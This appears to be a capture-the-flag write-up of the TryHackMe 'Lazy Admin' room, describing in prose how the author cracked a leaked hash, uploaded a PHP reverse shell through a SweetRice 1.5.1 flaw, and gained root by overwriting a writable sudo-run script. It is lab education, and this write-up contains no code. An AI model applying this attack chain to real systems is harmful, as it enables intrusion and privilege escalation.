TryHackMe — Lazy Admin

Easy linux machine to practice your skills

Link to Room: https://tryhackme.com/room/lazyadmin

I started with an nmap scan and found both SSH and a web server:

I went to the web server in my browser and found a default Apache landing page:

I scanned for some common directories using gobuster and got the following hits:

At /content I got this message:

I’ve never heard of SweetRice before, so I tried to read up a little about it, HERE.

I expanded the search from /content, and found a few more directories:

At /as, I got this:

At /inc I found a bunch of files:

I think I found the version number here:

The other interesting file here was the “mysql_backup” file. Which seemed to show some users named admin and manager. And it looks like manager has a password hash:

I quickly threw it into an online password cracker and hilariously, the password is “Password123”, which is funny because I tried that exact same password for the admin user at the login page earlier.

And we’re in:

I switched the website on to see what would happen and this was all it was:

Well now that I have the version number I can look for some exploits. I initially searched Metasploit for vulnerabilities, but they didn’t have anything:

But I was able to find a bunch online and in searchsploit:

Looks like quite a few for version 1.5.1 in searchsploit. I chose the XSRF and PHP Execution one and downloaded for more info.

So according to this, I need to go to the Adding Ads section and upload this, which will allow me to add PHP code to the server.

I used the script provided but made some changes, highlighted here:

The URL will be personal to you, it’s the IP you got assigned from TryHackMe.

Then you can replace the php code to add in a reverse shell. I opted for the tried and true reverse shell from Pentest Monkey, found HERE.

You will replace the highlighted parts here:

I changed the php script, adding in my attackbox IP and a port for listening.

Then I set up a listener.

After you press DONE, you should see it here:

Then head to this directory to execute:

After you click on the exploit, head back to your listener where you should now see a shell has spawned:

Remember that you can create a better shell by using the following:

Right now it seems I’m logged in as www-data. Time to look around.

I finally found the first flag by navigating to the “itguy” user:

mysql_login.txt gives a username (rice) and password (randompass). Not sure if that will be useful yet.

Right now my goal is to escalate privileges. Currently, I have the following permissions:

This says that I can manipulate backup.pl with no password required.

After checking that file, I see that it’s running something called “/etc/copy.sh”

I went to check /etc/copy.sh and saw this, which looks like another reverse shell.

I then checked if I was able to write to it, in order to change it for my own devious purposes. And I could.

So essentially I’m going to try and change it to give me a shell. I’m going to keep it very simple and overwrite everything inside to /bin/bash

And since I know I can run this with sudo + no password because of what I saw earlier, I should be able to get root privileges after I run it.

Looks like it worked! And after this it was easy to navigate to the root flag:

I never did anything with those mysql logins I found. If anyone figured out what those were for, let me know.

--

--

CTF Writeups to facilitate cyber education.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store